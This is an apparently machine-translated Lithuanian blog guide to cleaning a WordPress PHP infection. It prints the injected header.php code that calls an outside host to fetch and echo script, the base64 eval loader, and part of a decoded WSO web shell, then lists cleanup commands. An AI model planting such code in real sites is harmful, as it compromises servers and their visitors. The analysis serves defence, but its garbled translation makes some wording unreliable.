Pašalinkite „WordPress PHP“ virusą

Šiame vadove pateikiamas konkretus atvejis, kai „WordPress“ tinklaraštis buvo virusas. Pašalinkite „WordPress PHP“ virusą.

turinys

Paskutinės dienos pastebėjau įtartiną kodą, kuris, atrodo, yra „WordPress“ PHP virusas. Buvo šis PHP kodas header.php, prieš liniją </head>.

<?php $wp_rssh = 'http'; $wp_gt = 'web'; error_reporting(0); ini_set('display_errors',0); $wp_uagent = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Firefox|MSIE/i', $wp_uagent) && preg_match ('/ NT/i', $wp_uagent))){
$wp_gturl=$wp_rssh."://".$wp_gt.$wp_rssh."s.com/".$wp_gt."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_uagent);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_gturl);
curl_setopt ($ch, CURLOPT_TIMEOUT, 10); $wp_cntnt = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_cntnt,1,3) === 'scr' ){ echo $wp_cntnt; } ?>

Tai yra PHP kodas, kuris, kaip parodyta, bando atkurti išteklių turinį išoriniame serveryje, tačiau dalis, nurodanti URL, yra neišsami.

Veiklos mechanizmas yra šiek tiek sudėtingesnis ir daro šį „WordPress PHP“ nematomą virusą paveiktų vietų lankytojams. Vietoj to, jis nukreiptas į paieškos sistemas („Google“) ir netiesiogiai lemia žymiai sumažėjusį lankytojų skaičių paveiktose svetainėse.

Kenkėjiškų programų „WordPress“ PHP kenkėjiškų programų informacija

1. Aukščiau pateiktas kodas yra header.php.

2. Serveryje pasirodė failas wp-log.php aplanke wp-includes.

3. wp-log.php Sudėtyje yra užšifruotas kodas, tačiau jį gana lengva iššifruoti.

<?php eval(gzinflate(base64_decode('7b1rd../Fw=='))) ?>

Kenkėjiškų programų kodo iššifravimas iš wp-log.php :

<?php
$auth_pass = "md5password";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
#+Dump Columns ////Boolean
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler" );
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5');

if(get_magic_quotes_gpc()) {
    function WSOstripslashes($array) {
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    }
    $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}

function wsoLogin() {
    die("
<pre align=center-->

<form method="post"><input name="pass" type="password" /><input type="submit" value="" /></form>" );
}

function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}

if(!empty($auth_pass)) {
if(isset($_POST['pass']) &amp;&amp; (md5($_POST['pass']) == $auth_pass))
WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
wsoLogin();
}

if(strtolower(substr(PHP_OS,0,3)) == "win" )
$os = 'win';
else
$os = 'nix';

$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
error_reporting(0);

$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
$cwd .= '/';
?>

Atrodo, kad tai yra PHP kenkėjiškų programų scenarijus, kuriame yra kodas, skirtas valdyti autentifikavimą ir veiksmus failų ir katalogų serveryje. Labai lengvai galima pastebėti, kad šiame scenarijuje yra kintamųjų, tokių kaip $auth_pass (autentifikavimo slaptažodis), $default_action (Numatytasis veiksmas), $default_use_ajax (numatytasis „Ajax“ naudojimas) ir $default_charset (Numatytasis simbolio nustatymas).

Akivaizdu, kad šiame scenarijuje yra skyrius, kuriame tikrinami HTTP vartotojų agentai, kad užkirstų kelią prieigai prie tam tikrų žiniatinklio robotų, tokių kaip paieškos varikliai. Jame taip pat yra skyrius, kuris patikrina PHP saugumo režimą ir nustato tam tikrus darbinius direktorius.

4. Jei naršyklėje pasiekiama wp-log.php, interneto puslapis pasirodo su lauku Autentifikavimas. Iš pirmo žvilgsnio atrodo, kad tai failų tvarkyklė, per kurią galima lengvai pakilti į naujus failus į tikslinį serverį.

Cum Devirusezi un svetainė „WordPress“?

Visada rankinio sutrikimo procesas apima pirmiausia atrasti ir suprasti, kas buvo pažeidžiamumas.

1. Generuoja visos svetainės atsarginę kopiją. Jame turi būti tiek failų, tiek duomenų bazės.

2. Apytiksliai nustatykite, kiek laiko virusas pasirodė, ir interneto serveryje ieško modifikuotų ar naujų failų, sukurtų apytiksliai.

Pavyzdžiui, jei norite pamatyti failus .php Sukurtas ar modifikuotas praėjusią savaitę, vykdykite komandą serveryje:

find /your/web/path -type f -mtime -7 -exec ls -l {} \; | grep "\.php$"

Tai yra paprastas būdas, kuriuo galite atmesti „WordPress“ failus ir tuos, kuriuose yra kenkėjiškos programos.

3. Patikrinkite failą .htaccess įtartinų direktyvų. Scenarijaus leidimas arba vykdymo eilutės.

4. Patikrinkite duomenų bazę. Labai įmanoma, kad kai kurie „WordPress“ įrašai ir puslapiai buvo redaguoti naudojant kenkėjišką programą arba pridėti naują vartotojai, turintys administratoriaus vaidmenį.

5. Patikrinkite aplankų ir failų rašymo leidimus. chmod ir chown.

Rekomenduojami leidimai yra šie: 644 failams ir 755 direktoriams.

find /web/root/public/ -type f -exec chmod 644 {} \;
find /web/root/public/ -type d -exec chmod 755 {} \;

6. Atnaujinkite visus WordPress Plugins / WordPress Themes.

Susiję: Ištaisykite peradresavimo „WordPress Hack 2023“ („Virus“ peradresavimas)

Tai yra metodai “Pagrindinis” per kurią galite atmesti svetainės / „WordPress“ tinklaraštį. Jei turite problemų ir jums reikia pagalbos, komentarų laukelis atidarytas.